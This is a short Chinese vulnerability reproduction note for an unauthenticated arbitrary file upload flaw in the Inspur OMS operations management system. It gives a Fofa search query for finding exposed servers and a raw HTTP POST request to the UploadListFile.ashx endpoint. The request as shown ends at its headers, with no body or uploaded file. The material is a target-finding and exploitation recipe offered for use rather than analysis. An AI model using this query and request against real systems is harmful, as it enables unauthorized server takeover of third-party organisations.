0x01 漏洞描述:
浪潮OMS运营管理系统 uploadlistfile 接口处存在任意文件上传漏洞,未经身份验证的远程攻击者可利用该漏洞获取服务器权限。
0x02 搜索语句:
Fofa:body="/cwbase/web/gsprtf/"
0x03 漏洞复现:
POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: /
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2